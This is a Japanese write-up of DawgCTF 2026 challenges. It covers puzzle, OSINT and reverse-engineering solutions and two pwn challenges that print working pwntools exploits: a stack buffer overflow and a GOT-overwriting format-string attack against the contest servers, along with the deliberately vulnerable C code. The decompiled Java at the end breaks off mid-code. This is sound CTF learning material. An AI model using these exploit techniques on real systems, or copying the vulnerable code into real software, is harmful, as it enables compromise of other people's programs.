この大会は2026/4/11 1:00(JST)~2026/4/13 1:00(JST)に開催されました。
今回もチームで参戦。結果は4400点で674チーム中174位でした。
自分で解けた問題をWriteupとして書いておきます。
Discord Challenge(Misc 25)
Discordに入り、#flagチャネルのメッセージを見ると、フラグが書いてあった。
DawgCTF{3nj0y_th3_c0mp3t1t10n!}
Hiding in Plain Sight (Misc 75)
問題文はこうなっている。
There's something strange about this image but I can't put my finger on it, any ideas?
The flag will be the name of the person or object you find, in the format DawgCTF{Chicken_Sandwich}画像に何か隠れているらしい。画像を小さくすると、前オバマ大統領に見える。
DawgCTF{Barack_Obama}
crazy? i was crazy once! they locked me in a (Misc 150)
リート文字を使いながら、同じ文が繰り返されている。一文ごとに改行を入れてみる。
crazy? i was crazy once! they locked me in a room, a round room, a round rubber room, a round rubber room with rats, round rats, round rubber rats, round rubber rats with wheels, round wheels, round rubber wheels, round rubber wheels that go round and round and round, it drove me }pl cr4zy!
cr4zy? i w4s cr4zy once! they locked me in 4 room, 4 round room, 4 round rubber room, 4 round rubber room with r4ts, round r4ts, round rubber r4ts, round rubber r4ts with wheels, round wheels, round rubber wheels, round rubber wheels th4t go round 4nd round 4nd round, it drove me eh_ cr4zy!
cr4zy? i w4s cr4zy onc3! th3y lock3d m3 in 4 room, 4 round room, 4 round rubb3r room, 4 round rubb3r room with r4ts, round r4ts, round rubb3r r4ts, round rubb3r r4ts with wh33ls, round wh33ls, round rubb3r wh33ls, round rubb3r wh33ls th4t go round 4nd round 4nd round, it drov3 m3 dne cr4zy!
cr4zy? 1 w4s cr4zy onc3! th3y lock3d m3 1n 4 room, 4 round room, 4 round rubb3r room, 4 round rubb3r room w1th r4ts, round r4ts, round rubb3r r4ts, round rubb3r r4ts w1th wh33ls, round wh33ls, round rubb3r wh33ls, round rubb3r wh33ls th4t go round 4nd round 4nd round, 1t drov3 m3 s_e cr4zy!
cr4zy? 1 w4s cr4zy 0nc3! th3y l0ck3d m3 1n 4 r00m, 4 r0und r00m, 4 r0und rubb3r r00m, 4 r0und rubb3r r00m w1th r4ts, r0und r4ts, r0und rubb3r r4ts, r0und rubb3r r4ts w1th wh33ls, r0und wh33ls, r0und rubb3r wh33ls, r0und rubb3r wh33ls th4t g0 r0und 4nd r0und 4nd r0und, 1t dr0v3 m3 sae cr4zy!
cr4zy? 1 w45 cr4zy 0nc3! th3y l0ck3d m3 1n 4 r00m, 4 r0und r00m, 4 r0und rubb3r r00m, 4 r0und rubb3r r00m w1th r4t5, r0und r4t5, r0und rubb3r r4t5, r0und rubb3r r4t5 w1th wh33l5, r0und wh33l5, r0und rubb3r wh33l5, r0und rubb3r wh33l5 th4t g0 r0und 4nd r0und 4nd r0und, 1t dr0v3 m3 lp_ cr4zy!
cr4zy? 1 w45 cr4zy 0nc3! 7h3y l0ck3d m3 1n 4 r00m, 4 r0und r00m, 4 r0und rubb3r r00m, 4 r0und rubb3r r00m w17h r475, r0und r475, r0und rubb3r r475, r0und rubb3r r475 w17h wh33l5, r0und wh33l5, r0und rubb3r wh33l5, r0und rubb3r wh33l5 7h47 g0 r0und 4nd r0und 4nd r0und, 17 dr0v3 m3 efi cr4zy!
cr4zy? 1 w45 cr4zy 0nc3! 7h3y l0ck3d m3 1n 4 r00m, 4 r0und r00m, 4 r0und rubb3r r00m, 4 r0und rubb3r r00m w17h r475, r0und r475, r0und rubb3r r475, r0und rubb3r r475 w17h wh33l5, r0und wh33l5, r0und rubb3r wh33l5, r0und rubb3r wh33l5 7h47 60 r0und 4nd r0und 4nd r0und, 17 dr0v3 m3 l_y (r4zy!
(r4zy? 1 w45 (r4zy 0n(3! 7h3y l0(k3d m3 1n 4 r00m, 4 r0und r00m, 4 r0und rubb3r r00m, 4 r0und rubb3r r00m w17h r475, r0und r475, r0und rubb3r r475, r0und rubb3r r475 w17h wh33l5, r0und wh33l5, r0und rubb3r wh33l5, r0und rubb3r wh33l5 7h47 60 r0und 4nd r0und 4nd r0und, 17 dr0v3 m3 m_f (r42y!
(r42y? 1 w45 (r42y 0n(3! 7h3y l0(k3d m3 1n 4 r00m, 4 r0und r00m, 4 r0und rubb3r r00m, 4 r0und rubb3r r00m w17h r475, r0und r475, r0und rubb3r r475, r0und rubb3r r475 w17h wh33l5, r0und wh33l5, r0und rubb3r wh33l5, r0und rubb3r wh33l5 7h47 60 r0und 4nd r0und 4nd r0und, 17 dr0v3 m3 o_l (r42y!
(r42y? 1 w45 (r42y 0n(3! 7h3y l0(k3d m3 1n 4 r00m, 4 r0(_)nd r00m, 4 r0(_)nd r(_)883r r00m, 4 r0(_)nd r(_)883r r00m w17h r475, r0(_)nd r475, r0(_)nd r(_)883r r475, r0(_)nd r(_)883r r475 w17h wh33l5, r0(_)nd wh33l5, r0(_)nd r(_)883r wh33l5, r0(_)nd r(_)883r wh33l5 7h47 60 r0(_)nd 4nd r0(_)nd 4nd r0(_)nd, 17 dr0v3 m3 ort (r42y!
(r42y? 1 w45 (r42y 0n(3! 7h3y l0(k3|) m3 1n 4 r00m, 4 r0(_)n|) r00m, 4 r0(_)n|) r(_)883r r00m, 4 r0(_)n|) r(_)883r r00m w17h r475, r0(_)n|) r475, r0(_)n|) r(_)883r r475, r0(_)n|) r(_)883r r475 w17h wh33l5, r0(_)n|) wh33l5, r0(_)n|) r(_)883r wh33l5, r0(_)n|) r(_)883r wh33l5 7h47 60 r0(_)n|) 4n|) r0(_)n|) 4n|) r0(_)n|), 17 |)r0v3 m3 noc (|242y!
(|242y? 1 w45 (|242y 0n(3! 7h3y l0(k3|) m3 1n 4 |200m, 4 |20(_)n|) |200m, 4 |20(_)n|) |2(_)883|2 |200m, 4 |20(_)n|) |2(_)883|2 |200m w17h |2475, |20(_)n|) |2475, |20(_)n|) |2(_)883|2 |2475, |20(_)n|) |2(_)883|2 |2475 w17h wh33l5, |20(_)n|) wh33l5, |20(_)n|) |2(_)883|2 wh33l5, |20(_)n|) |2(_)883|2 wh33l5 7h47 60 |20(_)n|) 4n|) |20(_)n|) 4n|) |20(_)n|), 17 |)|20v3 m3 _ll (|242y!
(|242y? 1 w45 (|242y 0n(3! 7h3y l0(k3|) /\/\3 1n 4 |200/\/\, 4 |20(_)n|) |200/\/\, 4 |20(_)n|) |2(_)883|2 |200/\/\, 4 |20(_)n|) |2(_)883|2 |200/\/\ w17h |2475, |20(_)n|) |2475, |20(_)n|) |2(_)883|2 |2475, |20(_)n|) |2(_)883|2 |2475 w17h wh33l5, |20(_)n|) wh33l5, |20(_)n|) |2(_)883|2 wh33l5, |20(_)n|) |2(_)883|2 wh33l5 7h47 60 |20(_)n|) 4n|) |20(_)n|) 4n|) |20(_)n|), 17 |)|20v3 /\/\3 a_t (|242y!
(|242y? 1 w45 (|242y 0/\/(3! 7h3y l0(k3|) /\/\3 1/\/ 4 |200/\/\, 4 |20(_)/\/|) |200/\/\, 4 |20(_)/\/|) |2(_)883|2 |200/\/\, 4 |20(_)/\/|) |2(_)883|2 |200/\/\ w17h |2475, |20(_)/\/|) |2475, |20(_)/\/|) |2(_)883|2 |2475, |20(_)/\/|) |2(_)883|2 |2475 w17h wh33l5, |20(_)/\/|) wh33l5, |20(_)/\/|) |2(_)883|2 wh33l5, |20(_)/\/|) |2(_)883|2 wh33l5 7h47 60 |20(_)/\/|) 4/\/|) |20(_)/\/|) 4/\/|) |20(_)/\/|), 17 |)|20v3 /\/\3 sol (|242y!
(|242y? 1 \/\/45 (|242y 0/\/(3! 7h3y l0(k3|) /\/\3 1/\/ 4 |200/\/\, 4 |20(_)/\/|) |200/\/\, 4 |20(_)/\/|) |2(_)883|2 |200/\/\, 4 |20(_)/\/|) |2(_)883|2 |200/\/\ \/\/17h |2475, |20(_)/\/|) |2475, |20(_)/\/|) |2(_)883|2 |2475, |20(_)/\/|) |2(_)883|2 |2475 \/\/17h \/\/h33l5, |20(_)/\/|) \/\/h33l5, |20(_)/\/|) |2(_)883|2 \/\/h33l5, |20(_)/\/|) |2(_)883|2 \/\/h33l5 7h47 60 |20(_)/\/|) 4/\/|) |20(_)/\/|) 4/\/|) |20(_)/\/|), 17 |)|20v3 /\/\3 _ev (|242y!
(|242y? 1 \/\/45 (|242y 0/\/(3! 7|-|3y l0(k3|) /\/\3 1/\/ 4 |200/\/\, 4 |20(_)/\/|) |200/\/\, 4 |20(_)/\/|) |2(_)883|2 |200/\/\, 4 |20(_)/\/|) |2(_)883|2 |200/\/\ \/\/17|-| |2475, |20(_)/\/|) |2475, |20(_)/\/|) |2(_)883|2 |2475, |20(_)/\/|) |2(_)883|2 |2475 \/\/17|-| \/\/|-|33l5, |20(_)/\/|) \/\/|-|33l5, |20(_)/\/|) |2(_)883|2 \/\/|-|33l5, |20(_)/\/|) |2(_)883|2 \/\/|-|33l5 7|-|47 60 |20(_)/\/|) 4/\/|) |20(_)/\/|) 4/\/|) |20(_)/\/|), 17 |)|20v3 /\/\3 ah_ (|242\|!
(|242\|? 1 \/\/45 (|242\| 0/\/(3! 7|-|3\| l0(k3|) /\/\3 1/\/ 4 |200/\/\, 4 |20(_)/\/|) |200/\/\, 4 |20(_)/\/|) |2(_)883|2 |200/\/\, 4 |20(_)/\/|) |2(_)883|2 |200/\/\ \/\/17|-| |2475, |20(_)/\/|) |2475, |20(_)/\/|) |2(_)883|2 |2475, |20(_)/\/|) |2(_)883|2 |2475 \/\/17|-| \/\/|-|33l5, |20(_)/\/|) \/\/|-|33l5, |20(_)/\/|) |2(_)883|2 \/\/|-|33l5, |20(_)/\/|) |2(_)883|2 \/\/|-|33l5 7|-|47 60 |20(_)/\/|) 4/\/|) |20(_)/\/|) 4/\/|) |20(_)/\/|), 17 |)|20v3 /\/\3 i{F (|242\|!
(|242\|? 1 \/\/45 (|242\| 0/\/(3! 7|-|3\| |_0(k3|) /\/\3 1/\/ 4 |200/\/\, 4 |20(_)/\/|) |200/\/\, 4 |20(_)/\/|) |2(_)883|2 |200/\/\, 4 |20(_)/\/|) |2(_)883|2 |200/\/\ \/\/17|-| |2475, |20(_)/\/|) |2475, |20(_)/\/|) |2(_)883|2 |2475, |20(_)/\/|) |2(_)883|2 |2475 \/\/17|-| \/\/|-|33|_5, |20(_)/\/|) \/\/|-|33|_5, |20(_)/\/|) |2(_)883|2 \/\/|-|33|_5, |20(_)/\/|) |2(_)883|2 \/\/|-|33|_5 7|-|47 60 |20(_)/\/|) 4/\/|) |20(_)/\/|) 4/\/|) |20(_)/\/|), 17 |)|20v3 /\/\3 i{F (|242\|!
(|242\|? 1 \/\/45 (|242\| 0/\/(3! 7|-|3\| |_0(|<3|) /\/\3 1/\/ 4 |200/\/\, 4 |20(_)/\/|) |200/\/\, 4 |20(_)/\/|) |2(_)883|2 |200/\/\, 4 |20(_)/\/|) |2(_)883|2 |200/\/\ \/\/17|-| |2475, |20(_)/\/|) |2475, |20(_)/\/|) |2(_)883|2 |2475, |20(_)/\/|) |2(_)883|2 |2475 \/\/17|-| \/\/|-|33|_5, |20(_)/\/|) \/\/|-|33|_5, |20(_)/\/|) |2(_)883|2 \/\/|-|33|_5, |20(_)/\/|) |2(_)883|2 \/\/|-|33|_5 7|-|47 60 |20(_)/\/|) 4/\/|) |20(_)/\/|) 4/\/|) |20(_)/\/|), 17 |)|20v3 /\/\3 waD 各文の最後の方の"drove me"と"crazy!"の間に逆順でフラグの断片がある。最後の文は一番最後にフラグの断片があり、逆にたどっていく。なお"TCg"部分が見つからず、"i{F"が重複しているので調整する。
DawgCTF{i_have_lost_all_control_of_my_life_please_send_help}
HAZMAT (Misc 150)
問題文はこうなっている。
I saw this CRAZY looking truck driving home. Can you figure out what it's carrying?
The flag format will be DawgCTF{PETROLLEUM_JELLY}トラックの後ろに1049の番号が見える。「UN 1049」で検索すると、AIによる概要に以下のように表示された。
UN 1049は、国際的な危険物輸送基準において「圧縮水素(HYDROGEN, COMPRESSED)」を 特定する4桁の国連番号です。クラス2.1の可燃性ガスに分類され、輸送時の危険有害性や 容器の安全基準が細かく定められています。
DawgCTF{COMPRESSED_HYDROGEN}
HAZMAT III (Misc 150)
問題文はこうなっている。
Apparently corporate says I have to deliver this really weird looking green vat somewhere,
can you help me figure out what number I should put on my placard when I transport this?
Your flag will look like DawgCTF{5661}.画像検索すると、AIによる概要に以下のように表示される。
この画像に写っている製品は、UCARTHERM™(ユーサーサーム)というブランドの熱媒体流体(ヒートトランスファーフルード)です。 HVAC(暖房・換気・空調)業界などで、凍結防止機能が必要な水ベースの熱媒体として広く使用されています。 ・製品の用途: 主に空調システムや工業プロセスの凍結防止・熱媒体として使用されます。 ・特徴: 漏れ検知のために蛍光黄色に着色されています。 ・安全性: 製品の安全データシート(MSDS)を参照してください。
「UCARTHERM MSDS」で検索すると、以下のPDFが見つかる。
https://www.chempoint.com/products/download?grade=30933&type=msds&srsltid=AfmBOooKBmcQNkkiAzve-n2Md17d0UH-QF3eajCgZlOcs_HlPgL8Tcfk
14. TRANSPORT INFORMATIONの章の「UN number」の項目に番号が書いてあった。
UN 3082
DawgCTF{3082}
Hiding in Plain Sight 2 (Misc 175)
問題文はこうなっている。
Something here seems a little off, can you figure out what?
The flag will be the name of the person or object you find, such as DawgCTF{Turkey_Sandwich}StegSolveで開き、Red plane 1 を見ると、人物が現れた。
この画像を検索すると、AIによる概要に以下のように表示された。
この画像は、プロレスラーや俳優として知られるジョン・シナのポートレートです。 ・彼はWWEで最も偉大なプロレスラーの一人として歴史に名を残しています。 ・「U CAN'T SEE ME」のフレーズでも有名です。 ・現在は俳優としても多くの映画に出演しています。
DawgCTF{John_Cena}
Gateway to the Turnpike (OSINT 50)
問題文はこうなっている。
They say all roads lead to Rome, but in this part of the mid-Atlantic, all roads lead to a very confusing set of gas stations. I snapped this photo on a road trip a while back. Do you think you could tell me the ZIP code of the place this was taken?
画像検索すると、以下のページが見つかる。
https://www.facebook.com/MeanwhileinYork/posts/the-eternal-stoplight-breezewood-pabreezewood-pennsylvania-often-dubbed-the-town/1218005587032160/
Breezewood, Pennsylvaniaの景色らしい。
マクドナルドの場所辺りから、Google Mapで調べると、この辺りになる。
https://www.google.com/maps/place/McDonald's/@39.9992867,-78.2408521,3a,75y,85.21h,88.09t/data=!3m7!1e1!3m5!1spyrvntOZqMGZ5hx6vlm1JQ!2e0!6shttps:%2F%2Fstreetviewpixels-pa.googleapis.com%2Fv1%2Fthumbnail%3Fcb_client%3Dmaps_sv.tactile%26w%3D900%26h%3D600%26pitch%3D1.9091292061006016%26panoid%3DpyrvntOZqMGZ5hx6vlm1JQ%26yaw%3D85.21238973926883!7i16384!8i8192!4m6!3m5!1s0x89ca34ff312b02d9:0xe5201bd60aed9c2c!8m2!3d39.9985648!4d-78.2399713!16s%2Fg%2F1hc6dtt4t?entry=ttu&g_ep=EgoyMDI2MDQwOC4wIKXMDSoASAFQAw%3D%3D
住所はこうなっている。
123 S Breezewood Rd, Breezewood, PA 15533 アメリカ合衆国
DawgCTF{15533}
The Temple of Doom (OSINT 50)
問題文はこうなっている。
I used to work at this crazy looking building. I've attached a picture of it, can you guess where it is?
If you can, the flag is the nickname the building has.
For instance, if the nickname was "The Dragon Building", the flag would be DawgCTF{The_Dragon_Building}.画像検索すると、以下のページが見つかる。
https://www.dcnewsnow.com/news/us-and-world/pyramid-for-sale-bids-start-at-70m-for-federal-building-in-california/
建物の名前は以下のようになっている。
Chet Holifield Federal Building
ニックネームは "The Ziggurat Building" とのこと。
DawgCTF{The_Ziggurat_Building}
Дмитрий-шесть (OSINT 50)
問題文はこうなっている。
My friend from Ukraine sent me this weird picture, he says that it's the key to a secret treasure room underground. Do you know where this picture was taken? The flag will be the official name of it, and should be 6 letters total, all capital letters.
画像検索すると、以下のページが見つかる。
https://posfie.com/@54_98554/p/8E8jPhg
Metro-2の写真ということらしい。
DawgCTF{METRO2}
Computer Repair II (OSINT 125)
問題文はこうなっている。
I just got another pic from the warehouse, not a lot to go on here, but could you figure out the screen size of this laptop?
The flag format will look like DawgCTF{18.9IN}.画像検索すると、AI による概要に次のように表示される。
これはDELLのノートパソコン「Latitude 5590」です。 ・15.6インチのフルHD(1920 x 1080)ディスプレイを搭載したビジネス向けモデルです。 ・第8世代のIntel Coreプロセッサに対応しており、頑丈な筐体が特徴です。 ・テンキー付きのキーボードを搭載しています。 ・中古市場では約29,700円から販売されています。
画面サイズは15.6インチ。
DawgCTF{15.6IN}
The Lookout's Legend (OSINT 125)
問題文はこうなっている。
High above the birthplace of the MTO, this mountain offers a view that spans six counties. What do the locals call this spot?
画像検索すると、以下のページが見つかる。
https://worldradiomap.com/us-pa/altoona
このページの以下の部分の写真に似ている。
Wopsononock Lookout Coordinates: 40°34'03" N, 78°26'25" W ; Ground Elevation AMSL: 2253 ft (778.1 m) Wopsononock Lookout, northwest of Altoona, Pennsylvania is the location of several radio and television broadcast towers.
Google Mapでこの緯度、経度を調べると、以下の名前で出ている。
Wopsy Lookout
DawgCTF{Wopsy_Lookout}
Stacking Flags (Pwn 100)
添付のソースコードはこうなっている。
/*gcc -fno-stack-protector -no-pie -z execstack -g -Wno-implicit-function-declaration in.c -o out*/ #include <stdio.h> #include <stdlib.h> void win() { FILE *fp; char flag[128]; fp = fopen("flag.txt", "r"); if (!fp) { puts("Could not open flag file."); fflush(stdout); exit(1); } fgets(flag, sizeof(flag), fp); puts(flag); fflush(stdout); fclose(fp); exit(0); } void vulnerable_function() { char buffer[64]; gets(buffer); } int main() { setbuf(stdout, NULL); setbuf(stdin, NULL); setbuf(stderr, NULL); fflush(stdout); vulnerable_function(); printf("win() is at: %p\n", win); printf("Better luck next time!\n"); return 0; }
BOFでwin関数をコールすればよい。
$ gcc -fno-stack-protector -no-pie -z execstack -g -Wno-implicit-function-declaration Stacking_flags.c -o Stacking_flags /usr/bin/ld: /tmp/ccCgfaaT.o: in function `vulnerable_function': /mnt/hgfs/Shared/Stacking_flags.c:27:(.text+0xb8): 警告: the `gets' function is dangerous and should not be used. $ ROPgadget --binary Stacking_flags | grep ": ret" 0x0000000000401016 : ret 0x0000000000401042 : ret 0x2f 0x0000000000401022 : retf 0x2f
#!/usr/bin/env python3 from pwn import * if len(sys.argv) == 1: p = remote('nc.umbccd.net', 8921) else: p = process('./Stacking_flags') elf = ELF('./Stacking_flags') ret_addr = 0x401016 win_addr = elf.symbols['win'] payload = b'A' * 72 payload += p64(ret_addr) payload += p64(win_addr) print(payload) p.sendline(payload) data = p.recvline().decode().rstrip() print(data)
実行結果は以下の通り。
[+] Opening connection to nc.umbccd.net on port 8921: Done
[*] '/mnt/hgfs/Shared/Stacking_flags'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX unknown - GNU_STACK missing
PIE: No PIE (0x400000)
Stack: Executable
RWX: Has RWX segments
Stripped: No
Debuginfo: Yes
b'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x16\x10@\x00\x00\x00\x00\x00\xa6\x11@\x00\x00\x00\x00\x00'
DawgCTF{$taching_br1cks}
[*] Closed connection to nc.umbccd.net port 8921
DawgCTF{$taching_br1cks}
Just Print It (Pwn 200)
添付のソースはこうなっている。
/*gcc -fno-stack-protector -no-pie -z execstack -g -Wno-implicit-function-declaration in.c -o out*/ #include <stdio.h> #include <stdlib.h> void win() { FILE *fp; char flag[128]; fp = fopen("flag.txt", "r"); if (!fp) { puts("Error opening flag file."); fflush(stdout); exit(1); } fgets(flag, sizeof(flag), fp); printf("Flag: %s\n", flag); fflush(stdout); fclose(fp); exit(0); } int main() { char buffer[128]; setbuf(stdout, NULL); setbuf(stdin, NULL); setbuf(stderr, NULL); fflush(stdout); fgets(buffer, sizeof(buffer), stdin); printf(buffer); puts("\nGoodbye!"); return 0; }
$ gcc -fno-stack-protector -no-pie -z execstack -g -Wno-implicit-function-declaration "Just_print_it .c" -o Just_print_it $ ./Just_print_it AAAA%p.%p.%p.%p.%p.%p.%p.%p AAAA0x7f2ea3903963.0xfbad208b.0x7ffd27220d70.(nil).(nil).0x252e702541414141.0x2e70252e70252e70.0x70252e70252e7025 Goodbye!
FSBの脆弱性があり、オフセットは6であることがわかる。この脆弱性を使って、puts関数アドレスの値をwin関数アドレスの値に書き換えればよい。
#!/usr/bin/env python3 from pwn import * context.arch = 'amd64' if len(sys.argv) == 1: p = remote('nc.umbccd.net', 8925) else: p = process('./Just_print_it') elf = ELF('./Just_print_it') puts_addr = elf.got['puts'] win_addr = elf.symbols['win'] writes_dict = {puts_addr: win_addr} payload = fmtstr_payload(6, writes_dict) print(payload) p.sendline(payload) data = p.recvrepeat(1).decode('utf-8', errors='ignore') print(data)
実行結果は以下の通り。
[+] Opening connection to nc.umbccd.net on port 8925: Done
[*] '/mnt/hgfs/Shared/Just_print_it'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX unknown - GNU_STACK missing
PIE: No PIE (0x400000)
Stack: Executable
RWX: Has RWX segments
Stripped: No
Debuginfo: Yes
b'%150c%11$lln%123c%12$hhn%47c%13$hhnaaaab\x00@@\x00\x00\x00\x00\x00\x01@@\x00\x00\x00\x00\x00\x02@@\x00\x00\x00\x00\x00'
c aaaabFlag: DawgCTF{s3v3r_PWNed!}
[*] Closed connection to nc.umbccd.net port 8925
DawgCTF{s3v3r_PWNed!}
Cheater Cheater... (Reverse Engineering 200)
jarをBytecode Viewerでデコンパイルする。
import java.awt.Color; import java.awt.Component; import java.awt.Font; import java.awt.Graphics; import java.awt.Graphics2D; import java.awt.Point; import java.awt.event.ActionEvent; import java.awt.event.ActionListener; import java.awt.event.KeyAdapter; import java.awt.event.KeyEvent; import java.util.ArrayList; import java.util.Arrays; import java.util.Random; import java.util.concurrent.Executors; import java.util.concurrent.TimeUnit; import javax.swing.InputMap; import javax.swing.JFrame; import javax.swing.JPanel; import javax.swing.SwingUtilities; import javax.swing.Timer; import javax.swing.UIManager; import javax.swing.UnsupportedLookAndFeelException; public class SimplePacMan extends JPanel implements ActionListener { private static final int tileSize = 24; private static final int numTiles = 80; private static final int delay = 100; private Timer timer; private int pacX = 960; private int pacY = 960; private static final int topbar = 125; private int pacVelocityX = 0; private int pacVelocityY = 0; private int direction = 0; private int[][] maze; private boolean loser; private boolean winner; private int score; private final int[][] mazedirs = new int[][]{{0, -1}, {0, 1}, {-1, 0}, {1, 0}}; private static JFrame frame; private JTextBasket barbecue2; private JTextBasket barbecue; private final String flag = "THIS IS NOT HOW YOU ARE SUPPOSED TO DO THE CHALLENGE. YOU CAN IF YOU WANT BUT IT'LL BE EASIER TO JUST CHEAT :) IF YOU DO REVERSE THIS, PLEASE DO A WRITE UP! I'M VERY CURIOUS TO HEAR THE PROCESS"; protected static final String pacVelocityZ = "6Ach6HiD0JmCc1L+RwxDRzhW3sC1kS6XydgSuWVFpxVXRU8EjfuMxIMoIzMwK/ii"; private static void runGUI() { JFrame.setDefaultLookAndFeelDecorated(true); frame = new JFrame("HacMan"); UIManager.LookAndFeelInfo[] var0 = UIManager.getInstalledLookAndFeels(); int var1 = var0.length; for(int var2 = 0; var2 < var1; ++var2) { UIManager.LookAndFeelInfo info = var0[var2]; if ("GTK+".equals(info.getName())) { try { UIManager.setLookAndFeel(info.getClassName()); } catch (InstantiationException | IllegalAccessException | UnsupportedLookAndFeelException | ClassNotFoundException var5) { var5.printStackTrace(); } break; } } frame.setDefaultCloseOperation(3); SimplePacMan viewer = new SimplePacMan(); frame.add(viewer); frame.pack(); frame.setSize(1920, 2045); frame.setVisible(true); } public static void main(String[] args) { SwingUtilities.invokeLater(new Runnable() { public void run() { SimplePacMan.runGUI(); } }); } public SimplePacMan() { this.generateMaze(); this.setSize(1920, 2045); this.setFocusable(true); this.addKeyListener(new KeyAdapter() { public void keyPressed(KeyEvent e) { switch (e.getKeyCode()) { case 37: SimplePacMan.this.pacVelocityX = -24; SimplePacMan.this.pacVelocityY = 0; SimplePacMan.this.direction = 2; break; case 38: SimplePacMan.this.pacVelocityX = 0; SimplePacMan.this.pacVelocityY = -24; SimplePacMan.this.direction = 1; break; case 39: SimplePacMan.this.pacVelocityX = 24; SimplePacMan.this.pacVelocityY = 0; SimplePacMan.this.direction = 0; break; case 40: SimplePacMan.this.pacVelocityX = 0; SimplePacMan.this.pacVelocityY = 24; SimplePacMan.this.direction = 3; } } }); this.barbecue = new JTextBasket(); this.barbecue.setName("Cowabunga!"); this.barbecue.setVisible(true); this.barbecue.firePropertyChange("delta", 2, 1); this.barbecue2 = new JTextBasket(); this.barbecue2.setInputMap(2, (InputMap)null); this.barbecue2.setVisible(false); JTextBasket barbecue2 = new JTextBasket(); barbecue2.setInputMap(2, (InputMap)null); barbecue2.setVisible(true); this.timer = new Timer(100, this); this.timer.start(); } private void generateMaze() { this.maze = new int[80][80]; ArrayList walls = new ArrayList(); Random rand = new Random(); this.barbecue = new JTextBasket(); this.barbecue.setName("javacode"); this.barbecue.setEnabled(false); this.add(this.barbecue); this.maze = this.prims(walls, rand.nextInt(80), rand.nextInt(80), this.maze, rand); } private int[][] prims(ArrayList walls, int startX, int startY, int[][] maze, Random rand) { maze[startX][startY] = 1; walls = this.addWalls(walls, startX, startY); while(true) { while(walls.size() > 0) { int windex = rand.nextInt(walls.size()); Point randWall = (Point)walls.get(windex); Point[] near = this.passage(randWall); if (near.length == 1) { maze[randWall.x][randWall.y] = 1; int newX = randWall.x + near[0].x * -1; int newY = randWall.y + near[0].y * -1; if (newX < 0 || newX >= 80 || newY < 0 || newY >= 80) { walls.remove(windex); continue; } maze[newX][newY] = 1; this.addWalls(walls, newX, newY); } walls.remove(windex); } return maze; } } private Point[] passage(Point wall) { return (Point[])Arrays.stream(this.mazedirs).filter((w) -> { return w[0] + wall.x >= 0 && w[0] + wall.x < 80 && w[1] + wall.y >= 0 && w[1] + wall.y < 80 && this.maze[w[0] + wall.x][w[1] + wall.y] == 1; }).map((w) -> { return new Point(w[0], w[1]); }).toArray((x$0) -> { return new Point[x$0]; }); } private ArrayList addWalls(ArrayList walls, int x, int y) { Arrays.stream(this.mazedirs).filter((w) -> { return w[0] + x >= 0 && w[0] + x < 80 && w[1] + y >= 0 && w[1] + y < 80 && this.maze[w[0] + x][w[1] + y] == 0; }).map((w) -> { return new Point(w[0] + x, w[1] + y); }).forEach(walls::add); return walls; } public void actionPerformed(ActionEvent e) { if (this.score >= 6942069) { this.winner = true; this.score = 6942069; } else { int mazeX = (this.pacX + this.pacVelocityX) / 24; int mazeY = (this.pacY + this.pacVelocityY) / 24; if (mazeX > 0 && mazeX < 80 && mazeY > 0 && mazeY < 80 && this.maze[mazeX][mazeY] != 0) { this.pacX += this.pacVelocityX; this.pacY += this.pacVelocityY; if (this.maze[mazeX][mazeY] == 1) { this.maze[mazeX][mazeY] = 2; this.score += 10; if (this.score == 64000) { this.loser = true; } } } } this.repaint(); } protected void paintComponent(Graphics g) { for(int x = 0; x < 80; ++x) { for(int y = 0; y < 80; ++y) { if (this.maze[x][y] == 0) { g.setColor(Color.BLUE); g.fillRect(x * 24, y * 24 + 125, 24, 24); } else { g.setColor(Color.BLACK); g.fillRect(x * 24, y * 24 + 125, 24, 24); if (this.maze[x][y] == 1) { g.setColor(Color.CYAN); g.fillOval(x * 24 + 6, y * 24 + 125 + 6, 12, 12); } } } } g.setColor(Color.YELLOW); g.fillArc(this.pacX, this.pacY + 125, 24, 24, 30 + 90 * this.direction, 300); g.setColor(Color.WHITE); g.fillRect(0, 0, 1920, 100); Graphics2D g2 = (Graphics2D)g; int fontSize = 50; Font f = new Font("Comic Sans MS", 1, fontSize); g2.setFont(f); g2.setColor(Color.RED); g2.drawString("Highscore: 6942069", 20, 100); g2.drawString("Your Score: " + this.score, 1320, 100); g2.setColor(Color.BLACK); g2.drawString("HAC - MAN", 735, 75); if (this.loser) { g.setColor(Color.RED); g.fillRect(480, 480, 980, 980); g.setColor(Color.WHITE); g.fillRect(490, 490, 960, 960); g2.setColor(Color.RED); g2.drawString("YOU LOSE!", 520, 580); f = new Font("Comic Sans MS", 1, 30); g2.setColor(Color.BLACK); g2.setFont(f); g2.drawString("In order to win, you need to cheat!", 520, 680); g2.drawString("The game will now close in 5... good luck!", 520, 780); Executors.newSingleThreadScheduledExecutor().schedule(() -> { System.exit(0); }, 5L, TimeUnit.SECONDS); } if (this.winner) { g.setColor(Color.GREEN); g.fillRect(480, 480, 980, 980); g.setColor(Color.WHITE); g.fillRect(490, 490, 960, 960); g2.setColor(Color.RED); g2.drawString("YOU WIN!!!", 520, 580); f = new Font("Comic Sans MS", 1, 30); g2.setColor(Color.BLACK); g2.setFont(f); this.setName(Integer.toString(this.score)); this.getComponents()[0].revalidate(); g2.drawString("Amazing job! Sometimes it's good to cheat..", 520, 680); g2.drawString("Or is it? " + ((Component)Arrays.stream(this.getComponents()).filter((w) -> { return w.isEnabled(); }).findFirst().get()).getName(), 520, 780); } f = new Font("Comic Sans MS", 1, 25); g2.setFont(f); g2.drawString("Sometimes you need to hack, man!", 660, 100); } } public class JTextBasket extends JComponent { : : public void revalidate() { this.invalidate(); Container rin = this.getParent(); rin.getName(); this.setEnabled(true); if (rin.getName() != "javacode") { byte[] three = this.hexStringToByteArray(String.valueOf((new BigInteger(rin.getName())).multiply(new BigInteger("10")).add(new BigInteger("1")).pow(4))); byte[] key = this.hexStringToByteArray((new StringBuilder((new BigInteger(rin.getName())).multiply(new BigInteger("10")).add(new BigInteger("1")).pow(4).toString())).reverse().toString()); byte[] decodedInput = Base64.getDecoder().decode("6Ach6HiD0JmCc1L+RwxDRzhW3sC1kS6XydgSuWVFpxVXRU8EjfuMxIMoIzMwK/ii"); Cipher cipher = null; try { cipher = Cipher.getInstance("AES/CBC/PKCS5Padding"); } catch (NoSuchAlgorithmException var13) { var13.printStackTrace(); } catch 